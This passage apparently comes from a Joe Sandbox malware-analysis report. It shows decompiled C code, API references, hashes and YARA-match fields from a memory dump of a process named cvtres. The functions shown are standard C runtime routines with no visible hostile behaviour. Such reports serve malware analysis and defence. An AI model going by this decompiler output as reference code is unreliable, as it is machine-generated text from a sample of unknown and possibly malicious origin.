                                                                    				_t1 = _t52 - 0x10;
                                                                    				 *_t1 =  *(_t52 - 0x10) & 0x00000000;
                                                                    				_t55 =  *_t1;
                                                                    				 *((intOrPtr*)(_t52 - 0xa8)) = 0x43f678;
                                                                    				 *(_t52 - 4) = 1;
                                                                    				 *(_t52 - 0x10) = 2;
                                                                    				 *((intOrPtr*)(_t52 - 0x58)) = 0x43f624;
                                                                    				E0041462B(_t52 - 0x58, _t52,  *_t1, _t52 - 0xa4);
                                                                    				_t51 = 3;
                                                                    				 *(_t52 - 4) = _t51;
                                                                    				_t11 =  *((intOrPtr*)(_t52 - 0xa8)) + 4; // 0x50
                                                                    				 *((intOrPtr*)(_t52 +  *_t11 - 0xa8)) = 0x43f674;
                                                                    				_push(2);
                                                                    				_push(_t52 - 0xa4);
                                                                    				E00417359(__ebx, _t51,  *_t1);
                                                                    				_push(_t43);
                                                                    				 *(_t52 - 4) = 4;
                                                                    				 *_t53 =  *((intOrPtr*)(_t52 + 0xc));
                                                                    				_push(_t52 - 0xa8);
                                                                    				E00416957(__ebx, _t43, __edi, _t51,  *_t1);
                                                                    				E004171E5(_t52 - 0xa8,  *((intOrPtr*)(_t52 + 8)));
                                                                    				 *(_t52 - 0x10) = _t51;
                                                                    				 *(_t52 - 4) = 0;
                                                                    				E004171A6(_t42, _t52 - 0x58, _t51, _t55);
                                                                    				 *((intOrPtr*)(_t52 - 0x58)) = 0x43f2fc;
                                                                    				E0041D1C9(_t52 - 0x58);
                                                                    				return E00420874( *((intOrPtr*)(_t52 + 8)));
                                                                    			}









                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00416167
                                                                      • Part of subcall function 0041462B: std::locale::_Init.LIBCPMT ref: 00414666
                                                                      • Part of subcall function 0041462B: std::locale::facet::_Incref.LIBCPMT ref: 00414674
                                                                      • Part of subcall function 00417359: __EH_prolog3.LIBCMT ref: 00417360
                                                                      • Part of subcall function 00416957: __EH_prolog3_catch.LIBCMT ref: 0041695E
                                                                      • Part of subcall function 004171A6: __EH_prolog3.LIBCMT ref: 004171AD
                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00416208
                                                                      • Part of subcall function 0041D1C9: std::ios_base::_Tidy.LIBCPMT ref: 0041D1EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3$std::ios_base::_$H_prolog3_catchIncrefInitIos_base_dtorTidystd::locale::_std::locale::facet::_
                                                                    • String ID: (sA$trA
                                                                    • API String ID: 223534676-3915461764
                                                                    • Opcode ID: 54f604097232bf114aaba5d2fa76611655fbb11b5142e4927b8fc4a197872d8f
                                                                    • Instruction ID: 0451b7755276c2063532e152c92a7bbb1495ea8ba69575a182be0b2e210d4a96
                                                                    • Opcode Fuzzy Hash: 54f604097232bf114aaba5d2fa76611655fbb11b5142e4927b8fc4a197872d8f
                                                                    • Instruction Fuzzy Hash: 92110DB4D00219EFDF00EFD4C845BCDBBB4AF09308F10849AE548AB241C7B897888F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 30%
                                                                    			E00422891(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                    				void* __ebp;
                                                                    				void* _t20;
                                                                    				void* _t22;
                                                                    				void* _t23;
                                                                    				void* _t25;
                                                                    				intOrPtr* _t26;
                                                                    				void* _t27;
                                                                    				void* _t28;
                                                                    
                                                                    				_t27 = __esi;
                                                                    				_t26 = __edi;
                                                                    				_t25 = __edx;
                                                                    				_t23 = __ecx;
                                                                    				_t22 = __ebx;
                                                                    				_t30 = _a20;
                                                                    				if(_a20 != 0) {
                                                                    					_push(_a20);
                                                                    					_push(__ebx);
                                                                    					_push(__esi);
                                                                    					_push(_a4);
                                                                    					E004227FF(__ebx, __edi, __esi, _t30);
                                                                    					_t28 = _t28 + 0x10;
                                                                    				}
                                                                    				_t31 = _a28;
                                                                    				_push(_a4);
                                                                    				if(_a28 != 0) {
                                                                    					_push(_a28);
                                                                    				} else {
                                                                    					_push(_t27);
                                                                    				}
                                                                    				E0042042A(_t23);
                                                                    				_push( *_t26);
                                                                    				_push(_a16);
                                                                    				_push(_a12);
                                                                    				_push(_t27);
                                                                    				E00422270(_t22, _t25, _t26, _t27, _t31);
                                                                    				_push(0x100);
                                                                    				_push(_a24);
                                                                    				_push(_a16);
                                                                    				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
                                                                    				_push(_a8);
                                                                    				_t14 = _t22 + 0xc; // 0x6e
                                                                    				_push(_t27);
                                                                    				_push(_a4);
                                                                    				_t20 = E004224E4(_t22,  *_t14, _t25, _t26, _t27, _t31);
                                                                    				if(_t20 != 0) {
                                                                    					E004203F1(_t20, _t27);
                                                                    					return _t20;
                                                                    				}
                                                                    				return _t20;
                                                                    			}












                                                                    APIs
                                                                    • ___BuildCatchObject.LIBCMT ref: 004228A4
                                                                      • Part of subcall function 004227FF: ___BuildCatchObjectHelper.LIBCMT ref: 00422835
                                                                    • _UnwindNestedFrames.LIBCMT ref: 004228BB
                                                                    • ___FrameUnwindToState.LIBCMT ref: 004228C9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                    • String ID: bad exception
                                                                    • API String ID: 2163707966-3837556057
                                                                    • Opcode ID: f39fb36694f02701e894e140306c736bfed23daeba737eff67630f948297a0e7
                                                                    • Instruction ID: e1e3094c7b54488b2a47325b3feb8f06a39c563c995722febe1ce7b31812a6e7
                                                                    • Opcode Fuzzy Hash: f39fb36694f02701e894e140306c736bfed23daeba737eff67630f948297a0e7
                                                                    • Instruction Fuzzy Hash: 78014F31100119BBDF126F51ED45EAB3F65FF08344F804016BD0815121DBBAD971DBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E004188BC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* _t34;
                                                                    				intOrPtr* _t38;
                                                                    				intOrPtr _t40;
                                                                    				void* _t41;
                                                                    				void* _t42;
                                                                    
                                                                    				_t42 = __eflags;
                                                                    				_push(4);
                                                                    				E00420808(E004337FA, __ebx, __edi, __esi);
                                                                    				_t40 =  *((intOrPtr*)(_t41 + 8));
                                                                    				_t38 = E0041FD3A(__edi, _t40, _t42);
                                                                    				 *((intOrPtr*)(_t40 + 8)) = 0;
                                                                    				 *((intOrPtr*)(_t40 + 0x10)) = 0;
                                                                    				 *((intOrPtr*)(_t40 + 0x14)) = 0;
                                                                    				 *((intOrPtr*)(_t41 - 4)) = 0;
                                                                    				E0041D990();
                                                                    				 *((intOrPtr*)(_t40 + 8)) = E00418971(0x43c8d8);
                                                                    				E0041D990();
                                                                    				 *((intOrPtr*)(_t40 + 0x10)) = E00418971("false");
                                                                    				E0041D990();
                                                                    				 *((intOrPtr*)(_t40 + 0x14)) = E00418971("true");
                                                                    				E0041D990();
                                                                    				 *((char*)(_t40 + 0xc)) =  *((intOrPtr*)( *_t38));
                                                                    				E0041D990();
                                                                    				 *((char*)(_t40 + 0xd)) =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 4))));
                                                                    				E0041D990();
                                                                    				 *((char*)(_t40 + 0xc)) = 0x2e;
                                                                    				_t34 = E0041D990();
                                                                    				 *((char*)(_t40 + 0xd)) = 0x2c;
                                                                    				return E00420874(_t34);
                                                                    			}









                                                                    APIs
                                                                    • __EH_prolog3_catch.LIBCMT ref: 004188C3
                                                                    • _localeconv.LIBCMT ref: 004188CB
                                                                      • Part of subcall function 0041FD3A: __getptd.LIBCMT ref: 0041FD3A
                                                                      • Part of subcall function 0041D990: ____lc_handle_func.LIBCMT ref: 0041D993
                                                                      • Part of subcall function 0041D990: ____lc_codepage_func.LIBCMT ref: 0041D99B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3_catch____lc_codepage_func____lc_handle_func__getptd_localeconv
                                                                    • String ID: false$true
                                                                    • API String ID: 2930029256-2658103896
                                                                    • Opcode ID: 0a5b60a25ca465a798fa03fa125a80a22b941d877fde70480af1cfa6286f290e
                                                                    • Instruction ID: fa5c6af2f701fda4367daf7c7d19c63fc8195d7845aaf5598709bb43565b0c88
                                                                    • Opcode Fuzzy Hash: 0a5b60a25ca465a798fa03fa125a80a22b941d877fde70480af1cfa6286f290e
                                                                    • Instruction Fuzzy Hash: C8010CF4D15B508FC714BF7A800625A7BE0AF05348B04DC6FE0E98B612DB3CD5848BAA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 96%
                                                                    			E0041F8F4(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                    				signed int _v8;
                                                                    				signed int _v12;
                                                                    				signed int _v16;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t56;
                                                                    				signed int _t60;
                                                                    				void* _t65;
                                                                    				signed int _t66;
                                                                    				signed int _t69;
                                                                    				signed int _t71;
                                                                    				signed int _t72;
                                                                    				signed int _t74;
                                                                    				signed int _t75;
                                                                    				signed int _t78;
                                                                    				signed int _t79;
                                                                    				signed int _t81;
                                                                    				signed int _t85;
                                                                    				signed int _t92;
                                                                    				signed int _t93;
                                                                    				signed int _t94;
                                                                    				signed int _t95;
                                                                    				intOrPtr* _t96;
                                                                    				void* _t97;
                                                                    
                                                                    				_t92 = _a8;
                                                                    				if(_t92 == 0 || _a12 == 0) {
                                                                    					L4:
                                                                    					return 0;
                                                                    				} else {
                                                                    					_t96 = _a16;
                                                                    					_t100 = _t96;
                                                                    					if(_t96 != 0) {
                                                                    						_t79 = _a4;
                                                                    						__eflags = _t79;
                                                                    						if(__eflags == 0) {
                                                                    							goto L3;
                                                                    						}
                                                                    						_t60 = _t56 | 0xffffffff;
                                                                    						_t88 = _t60 % _t92;
                                                                    						__eflags = _a12 - _t60 / _t92;
                                                                    						if(__eflags > 0) {
                                                                    							goto L3;
                                                                    						}
                                                                    						_t93 = _t92 * _a12;
                                                                    						__eflags =  *(_t96 + 0xc) & 0x0000010c;
                                                                    						_v8 = _t79;
                                                                    						_v16 = _t93;
                                                                    						_t78 = _t93;
                                                                    						if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
                                                                    							_v12 = 0x1000;
                                                                    						} else {
                                                                    							_v12 =  *(_t96 + 0x18);
                                                                    						}
                                                                    						__eflags = _t93;
                                                                    						if(_t93 == 0) {
                                                                    							L32:
                                                                    							return _a12;
                                                                    						} else {
                                                                    							do {
                                                                    								_t81 =  *(_t96 + 0xc) & 0x00000108;
                                                                    								__eflags = _t81;
                                                                    								if(_t81 == 0) {
                                                                    									L18:
                                                                    									__eflags = _t78 - _v12;
                                                                    									if(_t78 < _v12) {
                                                                    										_t65 = E0042371D(_t88, _t93,  *_v8, _t96);
                                                                    										__eflags = _t65 - 0xffffffff;
                                                                    										if(_t65 == 0xffffffff) {
                                                                    											L34:
                                                                    											_t66 = _t93;
                                                                    											L35:
                                                                    											return (_t66 - _t78) / _a8;
                                                                    										}
                                                                    										_v8 = _v8 + 1;
                                                                    										_t69 =  *(_t96 + 0x18);
                                                                    										_t78 = _t78 - 1;
                                                                    										_v12 = _t69;
                                                                    										__eflags = _t69;
                                                                    										if(_t69 <= 0) {
                                                                    											_v12 = 1;
                                                                    										}
                                                                    										goto L31;
                                                                    									}
                                                                    									__eflags = _t81;
                                                                    									if(_t81 == 0) {
                                                                    										L21:
                                                                    										__eflags = _v12;
                                                                    										_t94 = _t78;
                                                                    										if(_v12 != 0) {
                                                                    											_t72 = _t78;
                                                                    											_t88 = _t72 % _v12;
                                                                    											_t94 = _t94 - _t72 % _v12;
                                                                    											__eflags = _t94;
                                                                    										}
                                                                    										_push(_t94);
                                                                    										_push(_v8);
                                                                    										_push(E0042779D(_t96));
                                                                    										_t71 = E00428678(_t78, _t88, _t94, _t96, __eflags);
                                                                    										_t97 = _t97 + 0xc;
                                                                    										__eflags = _t71 - 0xffffffff;
                                                                    										if(_t71 == 0xffffffff) {
                                                                    											L36:
                                                                    											 *(_t96 + 0xc) =  *(_t96 + 0xc) | 0x00000020;
                                                                    											_t66 = _v16;
                                                                    											goto L35;
                                                                    										} else {
                                                                    											_t85 = _t94;
                                                                    											__eflags = _t71 - _t94;
                                                                    											if(_t71 <= _t94) {
                                                                    												_t85 = _t71;
                                                                    											}
                                                                    											_v8 = _v8 + _t85;
                                                                    											_t78 = _t78 - _t85;
                                                                    											__eflags = _t71 - _t94;
                                                                    											if(_t71 < _t94) {
                                                                    												goto L36;
                                                                    											} else {
                                                                    												L27:
                                                                    												_t93 = _v16;
                                                                    												goto L31;
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    									_t74 = E0041F474(_t88, _t96);
                                                                    									__eflags = _t74;
                                                                    									if(_t74 != 0) {
                                                                    										goto L34;
                                                                    									}
                                                                    									goto L21;
                                                                    								}
                                                                    								_t75 =  *(_t96 + 4);
                                                                    								__eflags = _t75;
                                                                    								if(__eflags == 0) {
                                                                    									goto L18;
                                                                    								}
                                                                    								if(__eflags < 0) {
                                                                    									_t45 = _t96 + 0xc;
                                                                    									 *_t45 =  *(_t96 + 0xc) | 0x00000020;
                                                                    									__eflags =  *_t45;
                                                                    									goto L34;
                                                                    								}
                                                                    								_t95 = _t78;
                                                                    								__eflags = _t78 - _t75;
                                                                    								if(_t78 >= _t75) {
                                                                    									_t95 = _t75;
                                                                    								}
                                                                    								E00420090( *_t96, _v8, _t95);
                                                                    								 *(_t96 + 4) =  *(_t96 + 4) - _t95;
                                                                    								 *_t96 =  *_t96 + _t95;
                                                                    								_t97 = _t97 + 0xc;
                                                                    								_t78 = _t78 - _t95;
                                                                    								_v8 = _v8 + _t95;
                                                                    								goto L27;
                                                                    								L31:
                                                                    								__eflags = _t78;
                                                                    							} while (_t78 != 0);
                                                                    							goto L32;
                                                                    						}
                                                                    					}
                                                                    					L3:
                                                                    					 *((intOrPtr*)(E00422147(_t100))) = 0x16;
                                                                    					E00423A0B();
                                                                    					goto L4;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                    • String ID:
                                                                    • API String ID: 2782032738-0
                                                                    • Opcode ID: cfe6b5ca2a59a5fae31735a707af07ff3020201040149e664561602bab7f2bc6
                                                                    • Instruction ID: cc03f274c396bd690d001866507c77ffe73d28f18c5a8b3c723fdac4fe4beabc
                                                                    • Opcode Fuzzy Hash: cfe6b5ca2a59a5fae31735a707af07ff3020201040149e664561602bab7f2bc6
                                                                    • Instruction Fuzzy Hash: 8041B471B10604ABDB249FA59444BEFBBB5AF80364F24813FE45997240D77CDE8B8B48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0042E73C(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                    				char _v8;
                                                                    				signed int _v12;
                                                                    				char _v20;
                                                                    				char _t43;
                                                                    				char _t46;
                                                                    				signed int _t53;
                                                                    				signed int _t54;
                                                                    				intOrPtr _t56;
                                                                    				intOrPtr _t57;
                                                                    				int _t58;
                                                                    				char _t59;
                                                                    				short* _t60;
                                                                    				int _t65;
                                                                    				char* _t73;
                                                                    
                                                                    				_t73 = _a8;
                                                                    				if(_t73 == 0 || _a12 == 0) {
                                                                    					L5:
                                                                    					return 0;
                                                                    				} else {
                                                                    					if( *_t73 != 0) {
                                                                    						E0041E2CD( &_v20, __edi, _a16);
                                                                    						_t43 = _v20;
                                                                    						__eflags =  *(_t43 + 0x14);
                                                                    						if( *(_t43 + 0x14) != 0) {
                                                                    							_t46 = E00428AD8( *_t73 & 0x000000ff,  &_v20);
                                                                    							__eflags = _t46;
                                                                    							if(_t46 == 0) {
                                                                    								__eflags = _a4;
                                                                    								_t40 = _v20 + 4; // 0x840ffff8
                                                                    								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                                                                    								if(__eflags != 0) {
                                                                    									L10:
                                                                    									__eflags = _v8;
                                                                    									if(_v8 != 0) {
                                                                    										_t53 = _v12;
                                                                    										_t11 = _t53 + 0x70;
                                                                    										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                    										__eflags =  *_t11;
                                                                    									}
                                                                    									return 1;
                                                                    								}
                                                                    								L21:
                                                                    								_t54 = E00422147(__eflags);
                                                                    								 *_t54 = 0x2a;
                                                                    								__eflags = _v8;
                                                                    								if(_v8 != 0) {
                                                                    									_t54 = _v12;
                                                                    									_t33 = _t54 + 0x70;
                                                                    									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                    									__eflags =  *_t33;
                                                                    								}
                                                                    								return _t54 | 0xffffffff;
                                                                    							}
                                                                    							_t56 = _v20;
                                                                    							_t15 = _t56 + 0xac; // 0x50036ad0
                                                                    							_t65 =  *_t15;
                                                                    							__eflags = _t65 - 1;
                                                                    							if(_t65 <= 1) {
                                                                    								L17:
                                                                    								_t24 = _t56 + 0xac; // 0x50036ad0
                                                                    								__eflags = _a12 -  *_t24;
                                                                    								if(__eflags < 0) {
                                                                    									goto L21;
                                                                    								}
                                                                    								__eflags = _t73[1];
                                                                    								if(__eflags == 0) {
                                                                    									goto L21;
                                                                    								}
                                                                    								L19:
                                                                    								_t26 = _t56 + 0xac; // 0x50036ad0
                                                                    								_t57 =  *_t26;
                                                                    								__eflags = _v8;
                                                                    								if(_v8 == 0) {
                                                                    									return _t57;
                                                                    								}
                                                                    								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                    								return _t57;
                                                                    							}
                                                                    							__eflags = _a12 - _t65;
                                                                    							if(_a12 < _t65) {
                                                                    								goto L17;
                                                                    							}
                                                                    							__eflags = _a4;
                                                                    							_t21 = _t56 + 4; // 0x840ffff8
                                                                    							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                    							__eflags = _t58;
                                                                    							_t56 = _v20;
                                                                    							if(_t58 != 0) {
                                                                    								goto L19;
                                                                    							}
                                                                    							goto L17;
                                                                    						}
                                                                    						_t59 = _a4;
                                                                    						__eflags = _t59;
                                                                    						if(_t59 != 0) {
                                                                    							 *_t59 =  *_t73 & 0x000000ff;
                                                                    						}
                                                                    						goto L10;
                                                                    					} else {
                                                                    						_t60 = _a4;
                                                                    						if(_t60 != 0) {
                                                                    							 *_t60 = 0;
                                                                    						}
                                                                    						goto L5;
                                                                    					}
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042E770
                                                                    • __isleadbyte_l.LIBCMT ref: 0042E7A3
                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,0042F3A9,00000109,00BFBBEF,00000003), ref: 0042E7D4
                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,0042F3A9,00000109,00BFBBEF,00000003), ref: 0042E842
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                    • String ID:
                                                                    • API String ID: 3058430110-0
                                                                    • Opcode ID: 8a2bb5608311336e6c8ec775829e184352da7f620ccbfd51da06a2c657c9639f
                                                                    • Instruction ID: c8928aa50c0add6015665f216cfe189acaea097098f2a01941b8ade04c710929
                                                                    • Opcode Fuzzy Hash: 8a2bb5608311336e6c8ec775829e184352da7f620ccbfd51da06a2c657c9639f
                                                                    • Instruction Fuzzy Hash: 3F31F230B00266EFCB20EFA6E8849BA3BB5FF41314F94856AF4518B291E734DD41DB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E0041D711(signed int _a4, signed int _a8, signed int _a9, char _a10) {
                                                                    				signed char _v7;
                                                                    				signed char _v8;
                                                                    				signed char _v12;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr _v20;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				intOrPtr _t42;
                                                                    				signed int _t47;
                                                                    				signed int _t51;
                                                                    				signed int _t52;
                                                                    				intOrPtr _t57;
                                                                    				signed int _t59;
                                                                    				signed int _t64;
                                                                    				void* _t72;
                                                                    				void* _t73;
                                                                    				signed int _t76;
                                                                    
                                                                    				_t76 = _a8;
                                                                    				_t79 = _t76;
                                                                    				if(_t76 != 0) {
                                                                    					_v16 =  *_t76;
                                                                    					_t42 =  *((intOrPtr*)(_t76 + 4));
                                                                    				} else {
                                                                    					_v16 =  *((intOrPtr*)(E00421FAE(_t72, _t73, _t76, _t79) + 8));
                                                                    					_t42 = E00421F88(_t72, _t73, _t76, _t79);
                                                                    				}
                                                                    				_v20 = _t42;
                                                                    				if(_v16 != 0) {
                                                                    					_t64 = _a4;
                                                                    					_push(_t73);
                                                                    					__eflags = _t64 - 0x100;
                                                                    					if(_t64 >= 0x100) {
                                                                    						L11:
                                                                    						__eflags = _t76;
                                                                    						if(__eflags != 0) {
                                                                    							_v12 = _t64;
                                                                    							_v12 = _v12 >> 8;
                                                                    							_t47 =  *( *((intOrPtr*)(_t76 + 8)) + (_v12 & 0x000000ff) * 2) >> 0x0000000f & 0x00000001;
                                                                    							__eflags = _t47;
                                                                    							L14:
                                                                    							__eflags = _t47;
                                                                    							if(__eflags == 0) {
                                                                    								_a8 = _t64;
                                                                    								_a9 = 0;
                                                                    								__eflags = 1;
                                                                    							} else {
                                                                    								_push(2);
                                                                    								_a8 = _v12;
                                                                    								_a9 = _t64;
                                                                    								_a10 = 0;
                                                                    								_pop(1);
                                                                    							}
                                                                    							_t51 = E004219F5(0x100, __eflags, 0, _v16, 0x100,  &_a8, 1,  &_v8, 3, _v20, 1);
                                                                    							__eflags = _t51;
                                                                    							if(_t51 != 0) {
                                                                    								__eflags = _t51 - 1;
                                                                    								_t52 = _v8 & 0x000000ff;
                                                                    								if(_t51 != 1) {
                                                                    									_t52 = _t52 << 0x00000008 | _v7 & 0x000000ff;
                                                                    									__eflags = _t52;
                                                                    								}
                                                                    								goto L21;
                                                                    							} else {
                                                                    								L18:
                                                                    								_t52 = _t64;
                                                                    								L21:
                                                                    								return _t52;
                                                                    							}
                                                                    						}
                                                                    						L12:
                                                                    						_v12 = _t64;
                                                                    						_v12 = _v12 >> 8;
                                                                    						_t47 =  *(E00421A3B(_t72, 0x100, _t76, __eflags) + (_v12 & 0x000000ff) * 2) & 0x8000;
                                                                    						goto L14;
                                                                    					}
                                                                    					__eflags = _t76;
                                                                    					if(_t76 != 0) {
                                                                    						_t57 =  *((intOrPtr*)(_t76 + 8));
                                                                    						__eflags =  *(_t57 + _t64 * 2) & 0x00000001;
                                                                    						if(( *(_t57 + _t64 * 2) & 0x00000001) == 0) {
                                                                    							goto L18;
                                                                    						}
                                                                    						goto L11;
                                                                    					}
                                                                    					__eflags = E00421AB5(_t64);
                                                                    					if(__eflags != 0) {
                                                                    						goto L12;
                                                                    					}
                                                                    					goto L18;
                                                                    				} else {
                                                                    					_t59 = _a4;
                                                                    					if(_t59 - 0x41 > 0x19) {
                                                                    						return _t59;
                                                                    					}
                                                                    					return _t59 + 0x20;
                                                                    				}
                                                                    			}





















                                                                    APIs
                                                                    • ____lc_handle_func.LIBCMT ref: 0041D721
                                                                      • Part of subcall function 00421FAE: __getptd.LIBCMT ref: 00421FAE
                                                                    • ____lc_codepage_func.LIBCMT ref: 0041D72C
                                                                      • Part of subcall function 00421F88: __getptd.LIBCMT ref: 00421F88
                                                                    • ___pctype_func.LIBCMT ref: 0041D791
                                                                    • ___crtLCMapStringA.LIBCMT ref: 0041D7F7
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __getptd$String____lc_codepage_func____lc_handle_func___crt___pctype_func
                                                                    • String ID:
                                                                    • API String ID: 3477544643-0
                                                                    • Opcode ID: df148876388ef54b50e1d1421a45f63fdd8ca2894a1057773d7dd2176c7ea29c
                                                                    • Instruction ID: 8c50663dd6643fa2ceec474a75a86dd31631e70e8d9f9de589f6722549c71921
                                                                    • Opcode Fuzzy Hash: df148876388ef54b50e1d1421a45f63fdd8ca2894a1057773d7dd2176c7ea29c
                                                                    • Instruction Fuzzy Hash: 1C3108B1E04255AEDB219F59C881BEE7BB4AF21304F18805BE875DB291D37CDAC1CB25
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E0041C21B(intOrPtr __ebx, void* _a4, void _a8) {
                                                                    				signed int _v8;
                                                                    				struct _SYSTEMTIME _v24;
                                                                    				signed short _v28;
                                                                    				signed short _v32;
                                                                    				void* _v36;
                                                                    				struct _FILETIME _v44;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t42;
                                                                    				void* _t44;
                                                                    				void _t48;
                                                                    				intOrPtr _t54;
                                                                    				intOrPtr _t62;
                                                                    				signed int _t65;
                                                                    				signed int _t71;
                                                                    
                                                                    				_t62 = __ebx;
                                                                    				_t42 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t42 ^ _t71;
                                                                    				_t44 = _a4;
                                                                    				_t69 = 0;
                                                                    				_t70 = __ebx + 0x70;
                                                                    				_v36 = _t44;
                                                                    				 *(__ebx + 0x7c) = 0;
                                                                    				 *((intOrPtr*)(__ebx + 0x84)) = 0;
                                                                    				 *((char*)(__ebx + 0x80)) = 0;
                                                                    				 *((intOrPtr*)(__ebx + 0x78)) = 0;
                                                                    				 *_t70 = 0;
                                                                    				 *((intOrPtr*)(__ebx + 0x90)) = 0;
                                                                    				 *((intOrPtr*)(__ebx + 0x74)) = 0;
                                                                    				if(_t44 == 0 || _t44 == 0xffffffff) {
                                                                    					_t45 = 0x10000;
                                                                    				} else {
                                                                    					if(SetFilePointer( *(__ebx + 4), 0, 0, 1) == 0xffffffff) {
                                                                    						_t48 = _a8;
                                                                    						 *_t70 =  *_t70 | 0xffffffff;
                                                                    						 *((intOrPtr*)(__ebx + 0x4c)) = 0x80000000;
                                                                    						if(_t48 != 0) {
                                                                    							 *_t70 = _t48;
                                                                    						}
                                                                    						 *((char*)(_t62 + 0x6c)) = 0;
                                                                    						GetLocalTime( &_v24);
                                                                    						SystemTimeToFileTime( &_v24,  &_v44);
                                                                    						_push(_v44.dwHighDateTime);
                                                                    						_t69 =  &_v28;
                                                                    						_t70 =  &_v32;
                                                                    						E0041BD4E( &_v28,  &_v32, _v44.dwLowDateTime);
                                                                    						_t54 = E0041BD2C(_v44.dwLowDateTime, _v44.dwHighDateTime);
                                                                    						 *((intOrPtr*)(_t62 + 0x50)) = _t54;
                                                                    						 *((intOrPtr*)(_t62 + 0x58)) = _t54;
                                                                    						 *((intOrPtr*)(_t62 + 0x60)) = _t54;
                                                                    						_t65 = _t68;
                                                                    						 *((intOrPtr*)(_t62 + 0x5c)) = _t65;
                                                                    						 *((intOrPtr*)(_t62 + 0x64)) = _t65;
                                                                    						 *(_t62 + 0x68) = (_v32 & 0x0000ffff) << 0x00000010 | _v28 & 0x0000ffff;
                                                                    						 *((intOrPtr*)(_t62 + 0x54)) = _t68;
                                                                    						 *((intOrPtr*)(_t62 + 0x7c)) = _v36;
                                                                    						goto L5;
                                                                    					} else {
                                                                    						_t70 = _v36;
                                                                    						_t68 = __ebx + 0x50;
                                                                    						if(E0041BDB5(_t70, __ebx + 0x50, __ebx + 0x4c, _t70, __ebx + 0x68) == 0) {
                                                                    							SetFilePointer(_t70, 0, 0, 0);
                                                                    							 *((char*)(__ebx + 0x6c)) = 1;
                                                                    							 *(__ebx + 0x7c) = _t70;
                                                                    							L5:
                                                                    							_t45 = 0;
